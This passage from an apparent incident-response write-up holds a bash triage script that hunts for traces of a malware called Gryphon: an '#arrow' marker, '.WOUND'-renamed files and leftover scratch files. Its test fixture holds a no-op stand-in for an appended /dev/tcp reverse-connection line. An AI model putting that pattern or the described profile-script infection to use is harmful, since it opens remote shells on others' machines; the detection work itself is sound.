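    find "$1" -type f -name "*$ENC_SUFFIX" 2>/dev/null
}

# Scratch files the directory walk and the self-destruct step write into
# the current directory. LIST.txt is a common name, so treat these as
# low-confidence leads that only matter next to a marker or .WOUND hit.
scan_leftovers() {
    find "$1" -type f \( -name 'LIST.txt' -o -name 'Gryphon.sh' \) 2>/dev/null
}

triage() {
    echo "== marker hits (file, kind, preceding line) =="; scan_markers "$1"
    echo "== renamed ciphertext ==";                       scan_encrypted "$1"
    echo "== scratch files (low confidence) ==";           scan_leftovers "$1"
}

# Constructed fixture: one clean script, one tampered script whose appended
# line is a harmless stand-in, one script that merely mentions the marker.
make_sample() {
    mkdir -p "$1/profile.d" "$1/home/Documents"
    printf '%s\n' '#!/bin/bash' 'export EDITOR=vi' > "$1/profile.d/clean.sh"
    printf '%s\n' '#!/bin/bash' 'umask 022' \
        ': constructed stand-in for an appended /dev/tcp/192.0.2.10/9 line' \
        '#arrow' > "$1/profile.d/tampered.sh"
    printf '%s\n' '#!/bin/bash' 'echo "#arrow is only mentioned here"' \
        > "$1/profile.d/mention.sh"
    : > "$1/home/Documents/report.odt.WOUND"
    printf 'home\nprofile.d\n' > "$1/LIST.txt"
}

if [ $# -gt 0 ]; then
    triage "$1"
else
    demo=$(mktemp -d) && make_sample "$demo" && triage "$demo"
    rm -rf "$demo"
fi
```

Point it at `/etc/profile.d` first, since that is where the infect mode starts its walk, then at user home directories. A marker hit tagged `other` still warrants review, because the appended line is whatever the operator configured.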